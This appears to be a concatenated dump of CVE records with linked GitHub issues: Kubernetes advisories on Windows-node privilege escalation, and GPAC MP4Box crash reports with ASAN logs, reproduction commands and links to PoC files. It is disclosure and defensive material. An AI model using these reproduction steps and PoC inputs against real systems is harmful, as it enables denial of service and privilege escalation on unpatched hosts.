## Versions - OS: Windows - Browser: Brave Browser | Version 1.57.57 Chromium: 116.0.5845.163 (Official Build) (64-bit) - Slims Version: slims9_bulian-9.6.1
Vuln0wned Report: SQL Injection in member_type.php
https://api.github.com/repos/slims/slims9_bulian/issues/216/comments
3
2023-10-08T16:42:47Z
2025-01-01T11:05:28Z
https://github.com/slims/slims9_bulian/issues/216
1,931,906,656
216
5,713
CVE-2023-3676
2023-10-31T21:15:08.550
A security issue was discovered in Kubernetes where a user that can create pods on Windows nodes may be able to escalate to admin privileges on those nodes. Kubernetes clusters are only affected if they include Windows nodes.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "jordan@liggitt.net", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "jordan@liggitt.net", "tags": [ "Exploit", "Mitigation", "Patch", "Third Party Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/119339" }, { "source": "jordan@liggitt.net", "tags": [ "Third Party Advisory" ], "url": "https://groups.google.com/g/kubernetes-security-announce/c/d_fvHZ9a5zc" }, { "source": "jordan@liggitt.net", "tags": null, "url": "https://security.netapp.com/advisory/ntap-20231130-0007/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Mitigation", "Patch", "Third Party Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/119339" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Third Party Advisory" ], "url": "https://groups.google.com/g/kubernetes-security-announce/c/d_fvHZ9a5zc" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://security.netapp.com/advisory/ntap-20231130-0007/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "FF4C81ED-BB69-490B-BABA-89C2501A5E6D", "versionEndExcluding": "1.24.17", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "86AE4580-37A1-4E7B-9B7A-A30316676065", "versionEndExcluding": "1.25.13", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.25.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "99BCE3D9-3EFA-4358-B36E-47954DBE28D4", "versionEndExcluding": "1.26.8", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.26.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "3F30AD24-3FA9-4FA8-BCD5-5351EA357B49", "versionEndExcluding": "1.27.5", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.27.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "A3FAE518-D5F9-4A7D-A703-1D36EA8A563C", "versionEndExcluding": "1.28.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.28.0", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ]
[ "20" ]
20
https://github.com/kubernetes/kubernetes/issues/119339
[ "Exploit", "Mitigation", "Patch", "Third Party Advisory" ]
github.com
[ "kubernetes", "kubernetes" ]
CVSS Rating: [CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) - **HIGH** (8.8) A security issue was discovered in Kubernetes where a user that can create pods on Windows nodes may be able to escalate to admin privileges on those nodes. Kubernetes clusters are only affected if they include Windows nodes. ### Am I vulnerable? Any kubernetes environment with Windows nodes is impacted. Run `kubectl get nodes -l kubernetes.io/os=windows` to see if any Windows nodes are in use. #### Affected Versions - kubelet <= v1.28.0 - kubelet <= v1.27.4 - kubelet <= v1.26.7 - kubelet <= v1.25.12 - kubelet <= v1.24.16 ### How do I mitigate this vulnerability? The provided patch fully mitigates the vulnerability and has no known side effects. Full mitigation for this class of issues requires patches applied for CVE-2023-3676, CVE-2023-3955, and CVE-2023-3893. Outside of applying the provided patch, there are no known mitigations to this vulnerability. #### Fixed Versions - kubelet master - fixed by #120127 - kubelet v1.28.1 - fixed by #120129 - kubelet v1.27.5 - fixed by #120130 - kubelet v1.26.8 - fixed by #120131 - kubelet v1.25.13 - fixed by #120132 - kubelet v1.24.17 - fixed by #120133 To upgrade, refer to the documentation: https://kubernetes.io/docs/tasks/administer-cluster/cluster-upgrade/ ### Detection Kubernetes audit logs can be used to detect if this vulnerability is being exploited. Pod create events with embedded powershell commands are a strong indication of exploitation. Config maps and secrets that contain embedded powershell commands and are mounted into pods are also a strong indication of exploitation. If you find evidence that this vulnerability has been exploited, please contact security@kubernetes.io #### Acknowledgements This vulnerability was reported by Tomer Peled @tomerpeled92 The issue was fixed and coordinated by the fix team: James Sturtevant @jsturtevant Mark Rossetti @marosset Andy Zhang @andyzhangx Justin Terry @jterry75 Kulwant Singh @KlwntSingh Micah Hausler @micahhausler Rita Zhang @ritazh and release managers: Jeremy Rickard @jeremyrickard /triage accepted /lifecycle frozen /area security /kind bug /committee security-response
CVE-2023-3676: Insufficient input sanitization on Windows nodes leads to privilege escalation
https://api.github.com/repos/kubernetes/kubernetes/issues/119339/comments
3
2023-07-14T18:27:48Z
2023-10-31T20:30:00Z
https://github.com/kubernetes/kubernetes/issues/119339
1,805,330,606
119,339
5,714
CVE-2023-3955
2023-10-31T21:15:08.613
A security issue was discovered in Kubernetes where a user that can create pods on Windows nodes may be able to escalate to admin privileges on those nodes. Kubernetes clusters are only affected if they include Windows nodes.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "jordan@liggitt.net", "type": "Secondary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1" }, "exploitabilityScore": 2.8, "impactScore": 5.9, "source": "nvd@nist.gov", "type": "Primary" } ], "cvssMetricV40": null }
[ { "source": "jordan@liggitt.net", "tags": [ "Exploit", "Mitigation", "Patch", "Third Party Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/119595" }, { "source": "jordan@liggitt.net", "tags": [ "Technical Description" ], "url": "https://groups.google.com/g/kubernetes-security-announce/c/JrX4bb7d83E" }, { "source": "jordan@liggitt.net", "tags": null, "url": "https://security.netapp.com/advisory/ntap-20231221-0002/" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Exploit", "Mitigation", "Patch", "Third Party Advisory" ], "url": "https://github.com/kubernetes/kubernetes/issues/119595" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Technical Description" ], "url": "https://groups.google.com/g/kubernetes-security-announce/c/JrX4bb7d83E" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": null, "url": "https://security.netapp.com/advisory/ntap-20231221-0002/" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "FF4C81ED-BB69-490B-BABA-89C2501A5E6D", "versionEndExcluding": "1.24.17", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "86AE4580-37A1-4E7B-9B7A-A30316676065", "versionEndExcluding": "1.25.13", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.25.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "99BCE3D9-3EFA-4358-B36E-47954DBE28D4", "versionEndExcluding": "1.26.8", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.26.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "3F30AD24-3FA9-4FA8-BCD5-5351EA357B49", "versionEndExcluding": "1.27.5", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.27.0", "vulnerable": true }, { "criteria": "cpe:2.3:a:kubernetes:kubernetes:*:*:*:*:*:*:*:*", "matchCriteriaId": "A3FAE518-D5F9-4A7D-A703-1D36EA8A563C", "versionEndExcluding": "1.28.1", "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": "1.28.0", "vulnerable": true } ], "negate": false, "operator": "OR" }, { "cpeMatch": [ { "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": false } ], "negate": false, "operator": "OR" } ], "operator": "AND" } ]
[ "20" ]
20
https://github.com/kubernetes/kubernetes/issues/119595
[ "Exploit", "Mitigation", "Patch", "Third Party Advisory" ]
github.com
[ "kubernetes", "kubernetes" ]
CVSS Rating: [CVSS:3.1/av:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H](https://www.first.org/cvss/calculator/3.1#CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) - **HIGH** (8.8) A security issue was discovered in Kubernetes where a user that can create pods on Windows nodes may be able to escalate to admin privileges on those nodes. Kubernetes clusters are only affected if they include Windows nodes. ### Am I vulnerable? Any kubernetes environment with Windows nodes is impacted. Run `kubectl get nodes -l kubernetes.io/os=windows` to see if any Windows nodes are in use. #### Affected Versions - kubelet <= v1.28.0 - kubelet <= v1.27.4 - kubelet <= v1.26.7 - kubelet <= v1.25.12 - kubelet <= v1.24.16 ### How do I mitigate this vulnerability? The provided patch fully mitigates the vulnerability (see fix impact below). Full mitigation for this class of issues requires patches applied for CVE-2023-3676, CVE-2023-3955, and CVE-2023-3893. Outside of applying the provided patch, there are no known mitigations to this vulnerability. #### Fixed Versions - kubelet master - fixed by #120128 - kubelet v1.28.1 - fixed by #120134 - kubelet v1.27.5 - fixed by #120135 - kubelet v1.26.8 - fixed by #120136 - kubelet v1.25.13 - fixed by #120137 - kubelet v1.24.17 - fixed by #120138 **Fix impact:** Passing Windows Powershell disk format options to in-tree volume plugins will result in an error during volume provisioning on the node. There are no known use cases for this functionality, nor is this functionality supported by any known out-of-tree CSI driver. To upgrade, refer to the documentation: https://kubernetes.io/docs/tasks/administer-cluster/cluster-upgrade/ ### Detection Kubernetes audit logs can be used to detect if this vulnerability is being exploited. Pod create events with embedded powershell commands are a strong indication of exploitation. If you find evidence that this vulnerability has been exploited, please contact security@kubernetes.io #### Acknowledgements This vulnerability was discovered by James Sturtevant @jsturtevant and Mark Rossetti @marosset during the process of fixing CVE-2023-3676 (that original CVE was reported by Tomer Peled @tomerpeled92) The issue was fixed and coordinated by the fix team: James Sturtevant @jsturtevant Mark Rossetti @marosset Andy Zhang @andyzhangx Justin Terry @jterry75 Kulwant Singh @KlwntSingh Micah Hausler @micahhausler Rita Zhang @ritazh and release managers: Jeremy Rickard @jeremyrickard
CVE-2023-3955: Insufficient input sanitization on Windows nodes leads to privilege escalation
https://api.github.com/repos/kubernetes/kubernetes/issues/119595/comments
2
2023-07-26T15:30:50Z
2023-11-01T00:33:34Z
https://github.com/kubernetes/kubernetes/issues/119595
1,822,677,454
119,595
5,715
CVE-2023-46930
2023-11-01T14:15:38.250
GPAC 2.3-DEV-rev605-gfc9e29089-master contains a SEGV in gpac/MP4Box in gf_isom_find_od_id_for_track /afltest/gpac/src/isomedia/media_odf.c:522:14.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Vendor Advisory" ], "url": "https://github.com/gpac/gpac/commit/3809955065afa3da1ad580012ec43deadbb0f2c8" }, { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://github.com/gpac/gpac/issues/2666" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Vendor Advisory" ], "url": "https://github.com/gpac/gpac/commit/3809955065afa3da1ad580012ec43deadbb0f2c8" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://github.com/gpac/gpac/issues/2666" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:2.3-dev-rev605-gfc9e29089-master:*:*:*:*:*:*:*", "matchCriteriaId": "276701A5-2ABB-4EDB-9E2A-96A6A9EA62D9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/gpac/gpac/issues/2666
[ "Vendor Advisory" ]
github.com
[ "gpac", "gpac" ]
# SEGV in MP4Box ### Description SEGV in gpac/MP4Box. #0 0x7ffff6697edd in gf_isom_find_od_id_for_track /afltest/gpac/src/isomedia/media_odf.c:522:14 ### Version ```shell MP4Box - GPAC version 2.3-DEV-rev605-gfc9e29089-master (c) 2000-2023 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_FFMPEG GPAC_HAS_VORBIS GPAC_HAS_LINUX_DVB ``` ### ASAN Log ./MP4Box -def -saf -unhint -ocr -out /dev/null poc5gpac ```shell AddressSanitizer:DEADLYSIGNAL ================================================================= ==3351432==ERROR: AddressSanitizer: SEGV on unknown address 0x00000000002c (pc 0x7ffff6697edd bp 0x7ffffffe65f0 sp 0x7ffffffe6420 T0) ==3351432==The signal is caused by a READ memory access. ==3351432==Hint: address points to the zero page. #0 0x7ffff6697edd in gf_isom_find_od_id_for_track /afltest/gpac/src/isomedia/media_odf.c:522:14 #1 0x7ffff6910e8e in gf_media_export_saf /afltest/gpac/src/media_tools/media_export.c:851:16 #2 0x7ffff69121c1 in gf_media_export /afltest/gpac/src/media_tools/media_export.c:1391:49 #3 0x4fe755 in mp4box_main /afltest/gpac/applications/mp4box/mp4box.c:6577:7 #4 0x7ffff58cc082 in __libc_start_main /build/glibc-BHL3KM/glibc-2.31/csu/../csu/libc-start.c:308:16 #5 0x42adad in _start (/afltest/gpac/bin/gcc/MP4Box+0x42adad) AddressSanitizer can not provide additional info. SUMMARY: AddressSanitizer: SEGV /afltest/gpac/src/isomedia/media_odf.c:522:14 in gf_isom_find_od_id_for_track ==3351432==ABORTING ``` ### Reproduction ```shell git clone https://github.com/gpac/gpac.git cd gpac ./configure --enable-sanitizer make -j24 ./bin/gcc/MP4Box -def -saf -unhint -ocr -out /dev/null poc5gpac ``` ### PoC poc5gpac: https://github.com/Frank-Z7/z-vulnerabilitys/blob/main/poc5gpac ### **Impact** This vulnerability is capable of causing crashes. ### Reference https://github.com/gpac/gpac ### Environment ``` ubuntu:20.04 gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.2) clang version 10.0.0-4ubuntu1 afl-cc++4.09 ``` ### Credit Zeng Yunxiang Song Jiaxuan
SEGV in gpac/MP4Box in gf_isom_find_od_id_for_track /afltest/gpac/src/isomedia/media_odf.c:522:14
https://api.github.com/repos/gpac/gpac/issues/2666/comments
0
2023-10-25T06:06:04Z
2023-10-26T10:37:04Z
https://github.com/gpac/gpac/issues/2666
1,960,612,139
2,666
5,716
CVE-2023-46931
2023-11-01T14:15:38.640
GPAC 2.3-DEV-rev605-gfc9e29089-master contains a heap-buffer-overflow in ffdmx_parse_side_data /afltest/gpac/src/filters/ff_dmx.c:202:14 in gpac/MP4Box.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Vendor Advisory" ], "url": "https://github.com/gpac/gpac/commit/671976fccc971b3dff8d3dcf6ebd600472ca64bf." }, { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://github.com/gpac/gpac/issues/2664" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Vendor Advisory" ], "url": "https://github.com/gpac/gpac/commit/671976fccc971b3dff8d3dcf6ebd600472ca64bf." }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://github.com/gpac/gpac/issues/2664" } ]
[ { "nodes": [ { "cpeMatch": [ { "criteria": "cpe:2.3:a:gpac:gpac:2.3-dev-rev605-gfc9e29089-master:*:*:*:*:*:*:*", "matchCriteriaId": "276701A5-2ABB-4EDB-9E2A-96A6A9EA62D9", "versionEndExcluding": null, "versionEndIncluding": null, "versionStartExcluding": null, "versionStartIncluding": null, "vulnerable": true } ], "negate": false, "operator": "OR" } ], "operator": null } ]
[ "787" ]
787
https://github.com/gpac/gpac/issues/2664
[ "Vendor Advisory" ]
github.com
[ "gpac", "gpac" ]
# heap-buffer-overflow in ffdmx_parse_side_data /afltest/gpac/src/filters/ff_dmx.c:202:14 in gpac/gpac ### Description Heap-buffer-overflow in MP4Box. ### Version ```shell MP4Box - GPAC version 2.3-DEV-rev605-gfc9e29089-master (c) 2000-2023 Telecom Paris distributed under LGPL v2.1+ - http://gpac.io Please cite our work in your research: GPAC Filters: https://doi.org/10.1145/3339825.3394929 GPAC: https://doi.org/10.1145/1291233.1291452 GPAC Configuration: Features: GPAC_CONFIG_LINUX GPAC_64_BITS GPAC_HAS_IPV6 GPAC_HAS_SSL GPAC_HAS_SOCK_UN GPAC_MINIMAL_ODF GPAC_HAS_QJS GPAC_HAS_JPEG GPAC_HAS_PNG GPAC_HAS_FFMPEG GPAC_HAS_VORBIS GPAC_HAS_LINUX_DVB ``` ### ASAN Log ./MP4Box -dash 1000 -diod -ts -dynamic -out /dev/null poc4gpac ```shell ================================================================= ==2427334==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x602000008f2c at pc 0x7ffff7382cb6 bp 0x7ffffffebc30 sp 0x7ffffffebc28 READ of size 4 at 0x602000008f2c thread T0 #0 0x7ffff7382cb5 in ffdmx_parse_side_data /afltest/gpac/src/filters/ff_dmx.c:202:14 #1 0x7ffff7382cb5 in ffdmx_init_common /afltest/gpac/src/filters/ff_dmx.c:1240:4 #2 0x7ffff738a0ca in ffdmx_initialize /afltest/gpac/src/filters/ff_dmx.c:1457:9 #3 0x7ffff6e7fa09 in gf_filter_new_finalize /afltest/gpac/src/filter_core/filter.c:543:8 #4 0x7ffff6e6f252 in gf_fs_load_source_dest_internal /afltest/gpac/src/filter_core/filter_session.c:3558:7 #5 0x7ffff6e94cf0 in gf_filter_swap_source_register /afltest/gpac/src/filter_core/filter.c:3824:2 #6 0x7ffff6e0c7be in gf_filter_pid_resolve_link_internal /afltest/gpac/src/filter_core/filter_pid.c:3545:11 #7 0x7ffff6e1b131 in gf_filter_pid_resolve_link_check_loaded /afltest/gpac/src/filter_core/filter_pid.c:3824:9 #8 0x7ffff6e1b131 in gf_filter_pid_init_task /afltest/gpac/src/filter_core/filter_pid.c:5111:12 #9 0x7ffff6e63b29 in gf_fs_thread_proc /afltest/gpac/src/filter_core/filter_session.c:2105:3 #10 0x7ffff6e6257d in gf_fs_run /afltest/gpac/src/filter_core/filter_session.c:2405:3 #11 0x7ffff67a6e5c in gf_dasher_process /afltest/gpac/src/media_tools/dash_segmenter.c:1236:6 #12 0x50dfc7 in do_dash /afltest/gpac/applications/mp4box/mp4box.c:4831:15 #13 0x50dfc7 in mp4box_main /afltest/gpac/applications/mp4box/mp4box.c:6245:7 #14 0x7ffff58cc082 in __libc_start_main /build/glibc-BHL3KM/glibc-2.31/csu/../csu/libc-start.c:308:16 #15 0x42adad in _start (/afltest/gpac/bin/gcc/MP4Box+0x42adad) 0x602000008f2c is located 4 bytes to the left of 16-byte region [0x602000008f30,0x602000008f40) allocated by thread T0 here: #0 0x4a3809 in realloc (/afltest/gpac/bin/gcc/MP4Box+0x4a3809) #1 0x7ffff3bafda6 in av_stream_add_side_data (/lib/x86_64-linux-gnu/libavformat.so.58+0x1bdda6) SUMMARY: AddressSanitizer: heap-buffer-overflow /afltest/gpac/src/filters/ff_dmx.c:202:14 in ffdmx_parse_side_data Shadow bytes around the buggy address: 0x0c047fff9190: fa fa 02 fa fa fa 00 05 fa fa 00 06 fa fa fd fa 0x0c047fff91a0: fa fa 07 fa fa fa 00 fa fa fa fd fd fa fa 00 06 0x0c047fff91b0: fa fa 00 01 fa fa 04 fa fa fa 00 fa fa fa 00 07 0x0c047fff91c0: fa fa 00 00 fa fa 07 fa fa fa 00 fa fa fa fd fd 0x0c047fff91d0: fa fa 00 06 fa fa 00 01 fa fa 04 fa fa fa 00 fa =>0x0c047fff91e0: fa fa 00 00 fa[fa]00 00 fa fa fd fd fa fa fd fa 0x0c047fff91f0: fa fa fd fa fa fa fd fd fa fa fd fa fa fa fd fa 0x0c047fff9200: fa fa fd fd fa fa fd fa fa fa fd fa fa fa fd fa 0x0c047fff9210: fa fa fd fa fa fa fd fd fa fa fd fa fa fa fd fa 0x0c047fff9220: fa fa fd fa fa fa fd fa fa fa fd fd fa fa fd fa 0x0c047fff9230: fa fa fd fa fa fa fd fa fa fa fd fa fa fa fd fd Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==2427334==ABORTING ``` ### Reproduction ```shell git clone https://github.com/gpac/gpac.git cd gpac ./configure --enable-sanitizer make -j24 ./bin/gcc/MP4Box -dash 1000 -diod -ts -dynamic -out /dev/null poc4gpac ``` *Thanks* *for* *your* *time*! ### PoC poc4gpac: https://github.com/Frank-Z7/z-vulnerabilitys/blob/main/poc4gpac ### **Impact** This vulnerability is capable of causing crashes. ### Reference https://github.com/gpac/gpac ### Environment ``` ubuntu:20.04 gcc version 9.4.0 (Ubuntu 9.4.0-1ubuntu1~20.04.2) clang version 10.0.0-4ubuntu1 afl-cc++4.09 ``` ### Credit Zeng Yunxiang Song Jiaxuan
heap-buffer-overflow in ffdmx_parse_side_data /afltest/gpac/src/filters/ff_dmx.c:202:14 in gpac/MP4Box
https://api.github.com/repos/gpac/gpac/issues/2664/comments
0
2023-10-24T13:31:01Z
2023-10-26T10:37:05Z
https://github.com/gpac/gpac/issues/2664
1,959,261,781
2,664
5,717
CVE-2023-46927
2023-11-01T15:15:08.707
GPAC 2.3-DEV-rev605-gfc9e29089-master contains a heap-buffer-overflow in gf_isom_use_compact_size gpac/src/isomedia/isom_write.c:3403:3 in gpac/MP4Box.
{ "cvssMetricV2": null, "cvssMetricV30": null, "cvssMetricV31": [ { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "REQUIRED", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "nvd@nist.gov", "type": "Primary" }, { "cvssData": { "attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 5.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "version": "3.1" }, "exploitabilityScore": 1.8, "impactScore": 3.6, "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary" } ], "cvssMetricV40": null }
[ { "source": "cve@mitre.org", "tags": [ "Patch", "Vendor Advisory" ], "url": "https://github.com/gpac/gpac/commit/a7b467b151d9b54badbc4dd71e7a366b7c391817" }, { "source": "cve@mitre.org", "tags": [ "Vendor Advisory" ], "url": "https://github.com/gpac/gpac/issues/2657" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Patch", "Vendor Advisory" ], "url": "https://github.com/gpac/gpac/commit/a7b467b151d9b54badbc4dd71e7a366b7c391817" }, { "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": [ "Vendor Advisory" ], "url": "https://github.com/gpac/gpac/issues/2657" } ]
